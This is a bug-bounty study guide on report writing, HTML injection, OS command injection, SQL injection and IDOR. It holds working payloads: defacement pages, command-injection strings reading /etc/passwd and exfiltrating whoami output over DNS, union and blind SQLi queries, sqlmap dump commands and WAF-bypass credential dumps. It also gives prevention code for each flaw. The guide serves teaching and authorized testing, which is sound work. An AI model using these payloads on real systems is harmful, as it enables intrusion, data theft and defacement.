Bug Hunting

A bug bounty program rewards individuals for reporting security vulnerabilities, with public and private options available. The document outlines the structure of bug reports, types of vulnerabilities like HTML injection and command injection, and provides examples of payloads and prevention methods. It emphasizes the importance of clarity in reports and proper input validation to prevent attacks.


1. What is a bug bounty?

A bug bounty program is an arrangement offered by many websites, organizations and software vendors under which individuals receive recognition and compensation for reporting bugs, especially those that are security vulnerabilities.

---> Public bug bounty programs: open to any security researcher and publicly listed. They attract a larger number of participants, which gives more diverse and thorough testing.

---> Private bug bounty programs: invitation-only and not publicly listed. They work with a smaller, curated group of trusted researchers; platforms usually send invitations based on a researcher's rank and track record.

Vulnerability Disclosure Program (VDP): a structured process through which an organization receives, triages and fixes vulnerability reports from outside researchers. Unlike a bounty program it usually offers no monetary reward, only recognition (hall of fame, swag).

Platforms:

1. HackerOne
2. Bugcrowd
3. Synack
4. Open Bug Bounty
5. https://www.yeswehack.com/
6. https://hackenproof.com/
7. Intigriti
8. https://safehats.com/
9. https://www.cyberarmy.id/
10. https://yogosha.com/

Practice platforms:

1. Hack The Box
2. TryHackMe

Scope:

1. In scope: assets the program explicitly allows you to test (and pays for).
2. Out of scope: assets you must not test; findings there are rejected, and testing them can violate the program's terms.

Vulnerability severity (priority ratings as used by Bugcrowd's VRT):

P1 (critical)
P2 (high)
P3 (medium)
P4 (low)
P5 (informational)

CVSS v3 score bands:

None (0.0)
Low (0.1 - 3.9)
Medium (4.0 - 6.9)
High (7.0 - 8.9)
Critical (9.0 - 10.0)

Score calculator:

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
Bug bounty report

Why reports matter:

1. The triager understands the bug quickly.
2. A faster fix, and therefore a faster payout.
3. A clear written record for legal and contractual purposes.

Structure:


1. Title

Purpose: The title should be clear and concise. It gives the reader an immediate
understanding of the type of vulnerability and the impacted area.

Example: "SQL Injection in the Login Endpoint of example.com."

2. Domain (optional)

Purpose: Specify the domain where the vulnerability was found. Ensure that it is
within the defined scope of the bug bounty program.
Example: example.com (in scope)

3. Endpoint (optional)

Purpose: Define the path leading to the page or file that contains the vulnerability.

Example: /login

4. Type

Purpose: Choose the vulnerability type from a standardized list.

Example: SQL Injection

5. Vulnerable Parameter

Purpose: Mention the parameter affected by the vulnerability (e.g., URL query
parameter, form field).

Example: username

6. Summary

Purpose: Provide a high-level overview of the vulnerability. Explain how the vulnerability was discovered and what type of attack it allows.

Example: "The login page is vulnerable to SQL Injection due to improper sanitization of user input in the username field. An attacker could extract sensitive data from the database."

7. Proof of Concept (PoC)

Purpose: Detail the steps to reproduce the vulnerability, including the exact requests and payloads used. Include screenshots or images if needed.

Example:

Step 1: Open the login page: example.com/login.

Step 2: Enter the following in the username field: ' OR 1=1--

Step 3: Observe that the login succeeds without a valid password.

Request (the body is URL-encoded in the real request):

POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

username=' OR 1=1--&password=random

8. Impact

Purpose: Explain the potential business or security impact of the vulnerability. This
helps to determine the severity.

Example: "An attacker could gain unauthorized access to user accounts, leading to a
breach of sensitive data."

CVSS Score: Calculate the Common Vulnerability Scoring System (CVSS) score for the finding with the CVSS v3.1 calculator linked above; include the vector string as well as the number so the triager can check your reasoning.

CVSS Score Example: 9.0 (Critical)

9. Remediation (optional)

Purpose: Offer a recommended fix for the vulnerability. This should be specific and actionable.

Example: "Use prepared statements or parameterized queries so that user input is always passed to the database as data and never concatenated into the SQL text."

Additional tips for students

Clarity and specificity: avoid vague language in descriptions and recommendations.

Proof: include screenshots, full request/response pairs, or a short video for complex issues to strengthen your report.

Review scope: always read the program's policy to make sure the asset and the bug class you are reporting are in scope.

Impact statement: reports that do not demonstrate clear impact are often closed as informational or rejected.

HTML injection

HTML injection is an attack in which attacker-controlled HTML markup is inserted into a page served by the website.

It happens when the application takes user input and embeds it in the HTML response without encoding it, so the browser treats the input as markup instead of text.

Consequences include fake login forms and links to phishing sites, webpage defacement, and injected content in emails the application sends on the user's behalf. If the injected markup can execute JavaScript, the bug is cross-site scripting (XSS), which is rated higher.

Types of HTML injection:

1. Reflected HTML injection: the payload is returned in the immediate response to the request that carried it (for example a search term echoed on the results page).

2. Stored HTML injection: the payload is saved server-side and rendered later, possibly to other users.

* temporary stored (shown for a limited time or until the record is overwritten)

* persistent stored (kept in the database and rendered on every view)

Common input points to test for this vulnerability:

1. Search bars
2. Contact forms
3. Comment sections
4. User registration forms
5. Login forms
6. Feedback forms
7. Product reviews
8. Chat boxes
9. Newsletter signup
10. Profile information, and similar

Fields that end up in emails are especially worth testing: the name field at account creation, the comment section, the password reset email, chat history sent by mail, and the name field on a product order (the payload then renders inside the email the application sends you).

Payloads:

https://github.com/InfoSecWarrior/Offensive-Payloads/blob/main/Html-Injection-Payloads.txt

<h1>SAI</h1>

<mark>SAI</mark>

qq<h1>SAI</h1>qq

<ins>SAI</ins>

<button type="button">Click Me!</button>

<s>SAI</s>

<time>09:10</time>

<video width="320" height="240" controls></video>

<body style="background-color:red">

<embed type="text/html" src="image url link" width="500" height="200"> { embeds an external resource such as an image in the page }

<svg width="100" height="100"><circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" /></svg>

<form method="GET">Username: <input type="text" name="username" value="" /> <br />Password: <input type="password" name="passwd" value="" /> <br /><input type="submit" name="submit" value="login" /></form> { fake login form for phishing }

<a href="https://www.dishtv.in">SAI</a> { link redirecting to another website }

<script>window.location.href="website path";</script> { JavaScript redirect to an attacker-chosen URL; if this executes, the finding is XSS rather than plain HTML injection }

Deface payloads:

1. (JavaScript: only works where the injection point executes script, i.e. the bug is XSS)

<script>
// Change the title of the page
document.title = "Defaced This site by saijain!";
// Replace the body content
document.body.innerHTML = `
<div style="text-align: center; margin-top: 50px;">
<h1 style="color: #ff4757;">Welcome to the Funny Defaced Page!</h1>
<h2 style="color: #2ed573;">You've been hacked!</h2>
<p style="font-size: 24px; color: #1e90ff;">
Just kidding! Enjoy this hilarious cat video instead!
</p>
<iframe width="560" height="315" src="https://youtu.be/kQ33oRB3wGE?si=fsPRKytpn0NtM7wL" frameborder="0" allowfullscreen></iframe>
<br><br>
<p style="font-size: 20px; color: #ff6348;">Don't forget to laugh!</p>
<img src="https://placekitten.com/400/300" alt="Funny Cat" style="border-radius: 10px;"/>
</div>
`;
</script>

2. (a complete static page: useful where you control a whole response or an uploaded file)

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Hacked!</title>
<style>
body {
  background-color: black;
  text-align: center;
  font-family: Arial, sans-serif;
}
h1 {
  color: red;
  font-size: 50px;
  text-shadow: 3px 3px 5px black;
}
h2 {
  color: yellow;
  font-size: 35px;
  text-shadow: 2px 2px 5px black;
}
h3 {
  color: lime;
  font-size: 30px;
  text-shadow: 2px 2px 5px black;
}
p {
  color: white;
  font-size: 20px;
}
img {
  width: 400px;
  height: auto;
  margin-top: 20px;
  border: 5px solid red;
  border-radius: 10px;
}
.glitch {
  animation: glitch 0.5s infinite;
}
@keyframes glitch {
  0% { transform: translateX(0px); }
  25% { transform: translateX(5px); }
  50% { transform: translateX(-5px); }
  75% { transform: translateX(3px); }
  100% { transform: translateX(0px); }
}
</style>
</head>
<body>
<h1 class="glitch">Welcome to the Defaced Page!</h1>
<h2 class="glitch">You Have Been Hacked!</h2>
<h3 class="glitch">This Page Hacked by SAI JAIN</h3>
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/8b/Anonymous_emblem.svg/800px-Anonymous_emblem.svg.png" alt="Hacker Image">
<p>Security is just an illusion!</p>
</body>
</html>

References:

https://rhashibur75.medium.com/html-injection-bug-bounty-a41f87217118

https://hackerone.com/reports/2210038

https://hackerone.com/reports/358001

https://medium.com/@pratiky054/html-injection-unique-exploitation-a5c3d4e6fed8

https://medium.com/@chaitanyarajhans024/simple-html-injection-to-250-895b760409ed

https://medium.com/@hackwithx24/html-injection-reflected-get-bwapp-series-1-4f595297f5c9

https://medium.com/@gandhim373/new-way-to-find-html-injection-get-easy-bounty-65fdd319d688

https://vedanttekale20.medium.com/how-html-injection-in-email-got-me-my-first-bounty-761592eab6bb

https://ms-official5878.medium.com/html-injection-a3f791d31b3c

https://hardik-solanki.medium.com/html-injection-stored-which-ultimately-resulted-into-a-cve-2020-26049-61c1a47dc2e8

https://medium.com/@novan.rmd/how-to-escalate-from-html-injection-to-data-steal-9c7e8ccf72b

https://devstringx-technologies.medium.com/html-injection-f1c9fc713d51

https://medium.com/@Parag_Bagul/my-journey-finding-html-injection-vulnerability-in-a-popular-british-accountancy-platform-fc051b942d88

https://medium.com/fmisec/what-is-html-injection-1431b26a9d31

https://medium.com/@MoSalah11/how-i-earned-from-html-injection-7b4da98ab6e3

https://medium.com/cyberverse/got-easiest-bounty-with-html-injection-via-email-confirmation-b1b10575a105

https://www.linkedin.com/pulse/my-first-250-html-injection-bug-yusuf-seboru

https://www.linkedin.com/pulse/html-injection-email-template-aishwarya-ghag

https://hackerone.com/reports/1443567

https://hackerone.com/reports/1581499

How to prevent HTML injection?

The root cause is that user input is written into the HTML response without being validated on the way in or encoded on the way out. Checking input for "<script>" or "<html>" tags, as many tutorials suggest, is a blacklist and is easily bypassed: most of the payloads above contain no <script> tag at all. The reliable rule is contextual output encoding: every piece of user-controlled data is HTML-entity-encoded (< > " ' &) at the point where it is inserted into the page or the email template, so the browser displays it as text. Input validation (length limits, allow-lists for fields such as names) is a useful second layer, and a Content Security Policy limits what injected markup can do.
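The difference between the tag-blacklist advice and output encoding, as an added Python example (not code from these notes). It assumes a hypothetical profile page that greets the user by name; html.escape is Python's standard HTML entity encoder, and the payloads are taken from the list above plus one constructed form.

```python
import html
import re

# Constructed sample payloads: the first two are from the payload list above,
# the third is a fake login form. None of them contains a <script> tag.
PAYLOADS = [
    '<h1>SAI</h1>',
    '<a href="https://www.dishtv.in">SAI</a>',
    '<form method="GET">Username: <input name="username"></form>',
]

# Hypothetical greeting template; {name} is the user-controlled value.
TEMPLATE = "<p>Welcome back, {name}!</p>"


def render_vulnerable(name: str) -> str:
    """Raw interpolation: the browser parses the name as markup."""
    return TEMPLATE.format(name=name)


def render_blacklisted(name: str) -> str:
    """The 'check for <script>/<html>' advice: strips those two tags and
    lets every other tag through."""
    cleaned = re.sub(r"</?(script|html)[^>]*>", "", name, flags=re.IGNORECASE)
    return TEMPLATE.format(name=cleaned)


def render_encoded(name: str) -> str:
    """Contextual output encoding for HTML text: < > & " ' become entities,
    so whatever the user typed is displayed literally."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def contains_markup(rendered: str) -> bool:
    """Crude oracle: is there any tag inside the template's own <p>...</p>?"""
    body = rendered[len("<p>"):-len("</p>")]
    return re.search(r"<[a-zA-Z/]", body) is not None
```

The blacklist stops exactly the one payload it was written for; the encoded version is safe for all of them without knowing the payloads in advance. The same encoder must be applied where names are put into email templates, and attribute, JavaScript and URL contexts each need their own encoder rather than html.escape.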

OS command injection vulnerability

Command injection is a vulnerability that lets an attacker execute arbitrary operating-system commands on the server hosting a vulnerable web application.

It arises when the application builds a shell command from user input and fails to validate the input or to keep it out of the shell's syntax, so shell metacharacters are interpreted as command separators.

Impact:

Data exfiltration, deletion or modification.

Service disruption: attackers can disrupt services or crash systems by running harmful commands.

Remote code execution: full control of the account the web application runs as, often a foothold for moving further into the network.

Types of command injection:

Verbose command injection:

The attacker sees the output of the injected command directly in the application's response, which makes exploitation straightforward.

Blind command injection:

The attacker can inject commands but does not see the output. Results are inferred from side effects: response time (time delays), files written to a web-accessible directory, or out-of-band DNS/HTTP requests.

Payloads: the separators differ slightly by target. Unix shells accept ; | || & && newline, backticks and $( ); Windows cmd accepts & && | || but not ;. The commands differ too (whoami works on both, ls/cat versus dir/type), so keep one list per target OS.

https://github.com/payloadbox/command-injection-payload-list

; ls -la

|hostname

||whoami

&hostname

;netstat -antp

;cat /etc/passwd

|cat /etc/group
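How the separators above actually get interpreted, and the two fixes that stop them, as an added Python example (not code from these notes). The "stock check" backend is a constructed stand-in that runs plain echo so the demo works on any system with a POSIX /bin/sh (assumption); the store id and the INJECTED marker are made up for the demo.

```python
import re
import shlex
import subprocess


def stock_check_vulnerable(store_id: str) -> str:
    """User input concatenated into a shell command line: ; | & and friends
    are interpreted by the shell, so `1; echo INJECTED` runs a second command."""
    cmd = f"echo stock for store {store_id}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def stock_check_quoted(store_id: str) -> str:
    """If a shell string is unavoidable, shlex.quote turns the value into one
    shell word, so the separators arrive as literal characters."""
    cmd = f"echo stock for store {shlex.quote(store_id)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def stock_check_safe(store_id: str) -> str:
    """Preferred fix: allow-list the input, then pass an argv list with no
    shell at all, so there is no command line to inject into."""
    if not re.fullmatch(r"[0-9]{1,6}", store_id):
        raise ValueError("store id must be 1-6 digits")
    argv = ["echo", "stock", "for", "store", store_id]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def injected(output: str) -> bool:
    """Oracle for the demo: did the payload's second command print its own line?"""
    return "INJECTED" in output.splitlines()
```

Run the three functions with the payload "1; echo INJECTED": the vulnerable one prints a second line, the quoted one echoes the whole string literally, and the allow-listed one rejects it before any process is started. Replace echo with ping and the payload with the time-delay form from the lab steps below and the same three behaviours appear as response-time differences.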

Most common parameter names to test for command injection:

id, cmd, cli, user, upload, file, ip, exec, command, execute, ping, query, jump, code, reg, do, func, arg, option, load, process, step, read, function, req, feature, exe, module, payload, run, print

Detecting OS command injection, simple case (these steps follow the PortSwigger Web Security Academy labs referenced below)

Use Burp Suite to intercept and modify a request that checks the stock level.

Modify the storeID parameter, giving it the value 1|whoami.

Observe that the response contains the name of the current user.

Detecting blind OS command injection using time delays

Use Burp Suite to intercept and modify the request that submits feedback.

Modify the email parameter, changing it to:

email=x||ping+-c+10+127.0.0.1||

Observe that the response takes 10 seconds to return.

Exploiting blind OS command injection by redirecting output

Use Burp Suite to intercept and modify the request that submits feedback.

Modify the email parameter, changing it to:

email=||whoami>/var/www/images/output.txt||

Now use Burp Suite to intercept and modify the request that loads an image of a product.

Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:

filename=output.txt

Observe that the response contains the output from the injected command.

Exploiting blind OS command injection using out-of-band (OAST) techniques

In Burp, open Burp Collaborator client and click "Copy to clipboard" to get a unique Collaborator subdomain.

Use Burp Suite to intercept and modify the request that submits feedback. Modify the email parameter, changing it to (replace BURP-COLLABORATOR-SUBDOMAIN with the copied value):

email=x||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

Forward the edited request, then go back to the Collaborator client and click "Poll now". A DNS lookup whose subdomain starts with the output of whoami confirms that the command executed, even though the HTTP response shows nothing.

command injection vulnerability locations :

Login or authentication forms: Systems that use shell commands to verify credentials could be
susceptible if input is not properly sanitized.

File upload or file management systems: Websites that allow file uploads, especially if they provide
features like image resizing or file parsing using shell commands.

Search functionality: If the search feature involves calling system utilities to search for files or content
on the server.

Web hosting or control panels (e.g., cPanel, Plesk): These often provide administrative tools and
functionalities that interact with the underlying server, potentially exposing command injection
vectors.

Website backup systems: Tools that allow users to create backups of their websites could expose
vulnerabilities if they interact with shell commands to compress or archive files.
Data parsing applications: Systems that parse logs, metadata, or XML files may include shell
execution vulnerabilities.

E-commerce sites with advanced user functionality: Systems that allow users to perform tasks like
generating reports, uploading CSVs, or running searches might use shell commands behind the
scenes.

Admin dashboards: Any admin area that executes server-side scripts or commands based on user
input might be prone to this.

Web applications with vulnerable APIs: APIs that accept user input and pass it to the system without
proper validation could lead to command injection.

Content management systems (CMS): Custom-built CMS or vulnerable plugins in popular CMS
platforms (e.g., WordPress, Joomla) might have flaws that lead to command injection.

References:

https://medium.com/@bdemir/a-pentesters-guide-to-command-injection-df2657c8c1ad

https://medium.com/@ashbaarshad777/exploring-os-command-injection-vulnerabilities-with-portswigger-labs-46453036e6b4
SQL injection

SQL injection (SQLi) occurs when attacker-supplied input is concatenated into a database query, letting the attacker change the query's logic to read, modify or delete data, bypass authentication and, in some configurations, reach the underlying server.

1. Error-based SQL injection

Relies on the application returning database error messages; the attacker crafts input that makes the database embed the data of interest in the error text.

2. Boolean-based blind SQL injection

The attacker gets no data back directly. Instead the injected condition is made to evaluate to true or false, and the difference in the application's response (content, length, status code) reveals one bit at a time.

3. Time-based blind SQL injection

Definition: relies on how long the application takes to respond. A deliberately slow query (SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in MSSQL) is made conditional on a guess, so a delayed response means true and a prompt one means false.

How it works: the attacker injects SQL containing the conditional delay and measures the response time to infer whether the condition held.

4. Union-based SQL injection

Uses the UNION operator to append the results of an attacker-chosen SELECT to the results of the original query, so data from other tables is returned in the normal page output. The injected SELECT must return the same number of columns, with compatible types, as the original query.

Payloads: https://github.com/payloadbox/sql-injection-payload-list

Common parameter names to test:
id=, pid=, uid=, cid=, rid=, mid=, fid=, tid=, sid=, item=, order=, invoice=, productid=, categoryid=, articleid=, pageid=, userid=, postid=, threadid=, commentid=, newsid=, eventid=, voteid=, pollid=, memberid=, entryid=, listingid=, sessionid=, recordid=, fileid=, docid=, reportid=, customerid=, page=, cat=, type=, sort=, filter=, status=, lang=, year=, date=, search=, keyword=, query=, lookup=, find=, token=, apikey=, user=, email=, username=, password=, session=, auth=, jwt=, key=, access_token=, login=, logout=, redirect=, callback=, cmd=, debug=, exec=, load=, process=, step=, action=, module=, view=, template=, config=, admin=, path=, dir=, folder=, file=

Types of SQL injection, by entry point and by technique:

GET-based: parameters in the URL query string.

POST-based: login forms, sign-up forms and other request bodies.

Header-based: values such as User-Agent, Referer or X-Forwarded-For that the application stores or logs via SQL.

Cookie-based: session or tracking cookies read into a query.

In-band: error-based and union-based (the data comes back in the same channel as the request).

Inferential (blind): boolean-based and time-based (the data is inferred from behaviour).


GET-based method:

Send characters that break the SQL syntax to check whether a parameter is injectable; a database error or a changed page means the input reaches the query:

id=1'
id=1"
id=1')
id=1")
id=1\
id=1/

To clear the error, close the injected string and comment out the rest of the original query (--+ is the MySQL -- comment followed by a space, URL-encoded as +):

id=1' --+
id=1" --+
id=1') --+
id=1") --+
id=1\ --+
id=1/ --+
id=1 and 0' order by 1--+

Find the number of columns (increase the number until the query errors; the last working value is the column count):

id=1' order by 4 --+

Find which columns are displayed on the page (a negative id makes the original SELECT return nothing, so only the UNION row is shown):

id=-1' union all select 1,2,3 --+

Find the current database name and server version:

id=-1' union all select 1,database(),version() --+

Find all database names (0x3c62723e is the hex encoding of <br>, used as a separator so each name appears on its own line):

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select 1,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),3 --+

Find all tables in a database (0x7365637572697479 is the hex encoding of "security", the sqli-labs database name; hex literals avoid quotes, which the injection context would break):

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select 1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7365637572697479),3 --+

Find all column names of a specific table (0x7573657273 = "users"):

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select 1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273),3 --+

Dump the data from a specific database, table and column:

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select 1,(SELECT+GROUP_CONCAT(id+SEPARATOR+0x3c62723e)+FROM+security.users),3 --+

NOTE: the HackBar extension in the Cyberfox browser (links below) has menu entries that generate these database/table/column extraction queries; paste the generated query into the position of the vulnerable column.

Boolean-based blind (no data is shown, only true/false behaviour):

Retrieve the length of the database name; the page loads normally only when the guessed length is correct:

' AND (length(database())) = 11 --+

Check the full database name; the response differs when the guess is right:

' OR database()="dbname" --  { space after -- }

Check the first character of the database name; the response changes when the guess is right:

' OR substring(database(),1,1)="s" --+

Check the second character:

' OR substring(database(),2,1)="e" --+

POST-based method (login forms):

Test characters to check whether a login form is injectable:

'
"
')
")

To clear the error, method 1 (MySQL -- comment; the space after -- is required):

' -- 
" -- 
') -- 
") -- 
\ -- 
/ -- 

To clear the error, method 2 (MySQL # comment):

'#
"#
')#
")#
\#
/#

Find the number of columns:

' order by 2 #
[OR]
' order by 2 -- 

Find which columns are displayed:

' union all select 1,2 -- 
[OR]
' union all select 1,2 #

Find the database name and server version:

' union all select database(),2 #
[OR]
' union all select version(),database() -- 

Find all database names:

' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 -- 
[OR]
' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

Find all table names in a database (0x7365637572697479 = "security"):

' union all select 1,(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479) -- 
[OR]
' union all select 1,(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479) #

Find all column names of a table (0x7573657273 = "users"):

' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 -- 
[OR]
' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #

Dump data from a specific database, table and columns:

' union all select (SELECT GROUP_CONCAT(id,username SEPARATOR 0x3c62723e) FROM security.users),2 -- 
[OR]
' union all select (SELECT GROUP_CONCAT(id,username SEPARATOR 0x3c62723e) FROM security.users),2 #

Boolean: of two possible outcomes exactly one occurs

0 - false
1 - true

Username and password bypass (the comment removes the password check, so only the always-true condition remains):

' OR 1=1 #
" OR 1=1 #
') OR 1=1 #
") OR 1=1 #

Check the database name; the login behaves differently (succeeds) when the guess is right:

' OR database()="dbname" --  { space after -- }
[OR]
' OR database()="dbname" #

e.g. security is the sqli-labs database name

Check the first character of the database name; the login succeeds when the guess is right:

' OR substring(database(),1,1)="s" #
[OR]
' OR substring(database(),1,1)="s" --  { space after -- }

Check the second character:

' OR substring(database(),2,1)="e" #
[OR]
' OR substring(database(),2,1)="e" --  { space after -- }

Time-based SQL injection (MySQL; the login takes about 5 seconds longer when the injection works):

' OR sleep(5) #
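The login bypass used in the report PoC and in the "username and password bypass" payloads, the parameterized fix recommended in the report's remediation section, and the character-by-character boolean-blind checks above (substring(database(),1,1)="s") automated into a loop, all in one added Python example that is not code from these notes. It assumes an in-memory SQLite database built inline with a made-up users table; the notes target MySQL, and the technique is identical, only the function names differ (substr instead of substring, -- as the comment).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo database: two users, credentials made up for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "S3cret!"), (2, "dumb", "Dumb")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Input spliced into the query text: the attacker controls the SQL syntax.
    Returns the matched username or None, exactly the true/false oracle a
    login page gives a blind attacker."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the driver sends values separately from the SQL,
    so quotes and comment markers are just data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def blind_extract_username(conn: sqlite3.Connection, user_id: int = 1,
                           max_len: int = 32) -> str:
    """Boolean-based blind extraction through the vulnerable login: guess one
    character at a time, the way the substring(database(),n,1) payloads above
    do by hand. Only 'did the login succeed' is observed."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_"
    extracted = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            payload = (f"' OR substr((SELECT username FROM users WHERE id={user_id}),"
                       f"{pos},1)='{ch}' -- ")
            if login_vulnerable(conn, payload, "x") is not None:
                found = ch
                break
        if found is None:
            break  # no character matched: we are past the end of the string
        extracted += found
    return extracted
```

With the database from make_db(), login_vulnerable accepts the username ' OR 1=1-- with any password and returns "admin", login_safe rejects it, and blind_extract_username recovers "admin" from nothing but login success and failure, in at most 37 requests per character. Adding a conditional delay to the payload instead of reading the result turns the same loop into the time-based variant.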

sqlmap:

Test which injection techniques the parameter is vulnerable to (--batch accepts the default answers without prompting, --random-agent sets a random User-Agent):

sqlmap -u "parameterlink" --risk=3 --level=5 --batch --random-agent

Extract database names:

sqlmap -u "parameterlink" --dbs

Extract table names from a database:

sqlmap -u "parameterlink" -D dbname --tables

Extract column names from a table:

sqlmap -u "parameterlink" -D dbname -T tablename --columns

Dump the data:

sqlmap -u "parameterlink" -D dbname -T tablename -C columnname --dump

ModSecurity (web application firewall) bypass:

MySQL executes the contents of versioned comments such as /*!50000union*/ (on MySQL 5.0.0 and later), while many WAF signatures do not match keywords wrapped this way, so the union-based steps are repeated with every keyword wrapped. This example has six columns.

Find the displayed columns:

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,4,5,6 --+

Find the database name:

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,database(),5,6 --+

Find the server version:

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,version(),5,6 --+

Find the database user:

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,user(),5,6 --+

Find all database names:

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+INFORMATION_SCHEMA.SCHEMATA),5,6 --+

Find table names in a database (0x6d797765626771735f62616e617374 = "mywebgqs_banast", the database in this example):

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+/*!50000INFORMATION_SCHEMA.TABLES*/+/*!50000WHERE*/+TABLE_SCHEMA=0x6d797765626771735f62616e617374),5,6 --+

Find column names in a table (0x7573657273 = "users"):

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+INFORMATION_SCHEMA.COLUMNS+/*!50000WHERE*/+TABLE_NAME=0x7573657273),5,6 --+

Dump the data (a user-variable trick: @x accumulates user_name and password from every row inside the WHERE clause, so GROUP_CONCAT is not needed):

-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,(SELECT(@x)/*!50000FROM*/(SELECT(@x:=0x00),(SELECT(@x)/*!50000FROM*/(mywebgqs_banast.users)/*!50000WHERE*/(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,user_name,password,0x3c62723e))))x),5,6 --+
Cyber fox browser :

https://sourceforge.net/projects/cyberfox/

Hack bar xpi

https://github.com/emyounoone/Hackbar

References:

https://hackerone.com/reports/1046084

bWAPP lab install on Kali Linux:

sudo apt install docker.io -y
sudo systemctl enable --now docker
sudo usermod -aG docker $USER
sudo docker pull hackersploit/bwapp-docker
sudo docker run -d -p 80:80 hackersploit/bwapp-docker

In the browser open 127.0.0.1/install.php and click the "here" link to install bWAPP, then log in at 127.0.0.1/login.php

Username: bee, password: bug

Insecure Direct Object Reference (IDOR) vulnerability

A web application references server-side objects by identifiers the client supplies ("id", "uid", "pid" and so on in URLs, request bodies, cookies or headers). If the server returns or modifies the object without checking that the logged-in user is authorized to access it, an attacker can swap in another user's identifier. These identifiers are visible in the browser, in an intercepting proxy such as Burp, or in a network capture, and tampering with them is how IDOR is found.

Variants and related manipulations:

1. Directory traversal: also known as path traversal, where the attacker reads or manipulates files and folders that should not be publicly reachable. A path traversal bug lets the attacker read sensitive files on the server, not just images, themes and scripts.

2. Body manipulation: changing values in the request body, such as input fields, radio buttons, checkboxes or hidden fields.

3. URL tampering: changing a parameter value in the URL. For example, at http://example.com/category/photos_id=1 we are authorized to see the data of ID 1; if changing it to http://example.com/category/photos_id=2 shows data that belongs to someone else, that is an IDOR via URL tampering.

4. Cookie ID manipulation: cookies identify users between requests. If a cookie such as _gid=123456 belongs to user A and _gid=789012 to user B, and user A can replace the value with user B's and see user B's information, that is an IDOR.

5. Blind IDOR: the result of the exploitation is not visible in the server response, for example modifying another user's private data without being able to read it.

6. Generic IDOR: the result of the exploitation is visible in the server response, for example reading confidential data or files belonging to another user.

Parameters:

id, gid, pid, uid, uuid, user, username, file, filename, dest

Where to look: account editing, order history, password change, invoice details, cancelling an order, adding a product to a cart, reading chat messages.

IDOR can be used to download files you are not authorized to see by changing the filename:

>> http://www.ifiles.com/download_file.php?a.txt

~ IDOR can be used to change other users' passwords by substituting their id on the password-change endpoint and then logging in to their accounts:

>> http://www.ifiles.com/change_password.php?id=1024

IDOR that lets you delete photos and albums from another user's gallery

IDOR that lets you insert and delete comments as another user

IDOR causing deletion of any account
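The missing check behind every example above, and the two-account test a bug hunter runs to find it, as an added Python example (not code from these notes). The invoice endpoint, its ids and owners are constructed for the demo; the handler signature (session user, object id) stands in for whatever framework the target uses.

```python
from dataclasses import dataclass
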